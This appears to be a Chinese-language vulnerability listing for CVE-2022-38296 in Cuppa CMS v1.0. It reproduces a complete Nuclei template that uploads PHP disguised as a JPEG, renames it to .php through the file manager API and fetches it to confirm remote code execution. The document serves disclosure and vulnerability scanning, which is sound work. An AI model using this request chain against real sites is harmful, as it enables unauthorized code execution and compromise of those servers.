CVE-2022-38296: Cuppa CMS v1.0 - Arbitrary File Upload

日期: 2025-08-01 | 影响软件: Cuppa CMS | POC: 已公开

漏洞描述

Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager.

PoC代码[已公开]

id: CVE-2022-38296

info:
  name: Cuppa CMS v1.0 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution and compromise of the affected system.
  remediation: |
    Apply the latest patch or upgrade to a newer version of Cuppa CMS to mitigate this vulnerability.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-38296
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-38296
    cwe-id: CWE-434
    epss-score: 0.82103
    epss-percentile: 0.9917
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: cuppacms
    product: cuppacms
  tags: cve,cve2022,rce,cuppa,intrusive,cuppacms

http:
  - raw:
      - |
        POST /js/jquery_file_upload/server/php/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI

        ------WebKitFormBoundary9MZjlIG8fVPjrlCI
        Content-Disposition: form-data; name="path"

        /
        ------WebKitFormBoundary9MZjlIG8fVPjrlCI
        Content-Disposition: form-data; name="unique_name"

        true
        ------WebKitFormBoundary9MZjlIG8fVPjrlCI
        Content-Disposition: form-data; name="resize_width"


        ------WebKitFormBoundary9MZjlIG8fVPjrlCI
        Content-Disposition: form-data; name="resize_height"


        ------WebKitFormBoundary9MZjlIG8fVPjrlCI
        Content-Disposition: form-data; name="crop"


        ------WebKitFormBoundary9MZjlIG8fVPjrlCI
        Content-Disposition: form-data; name="compress"


        ------WebKitFormBoundary9MZjlIG8fVPjrlCI
        Content-Disposition: form-data; name="files[]"; filename="test-{{randstr}}.jpg"
        Content-Type: image/jpeg

        <?php

        echo md5("CVE-2022-38296");

        ?>
        ------WebKitFormBoundary9MZjlIG8fVPjrlCI--
      - |
        POST /js/filemanager/api/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"from":"//{{filename}}","to":"//{{randstr}}.php","action":"rename"}
      - |
        GET /media/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - ed6bf8b1b4b8e64836455fe32b958c2c
        condition: and

      - type: word
        part: header_3
        words:
          - text/html

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: filename
        group: 1
        regex:
          - '"name":"(.*?)",'
        internal: true
# digest: 4b0a00483046022100abacd177125296e4863dc56f9cc0a7f6b1307fd4127dea25b15cdc73609e2477022100b762a46031c477a9f67e0937fc76a9193076b314040ba6cf0cacd6513a5f0d1f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐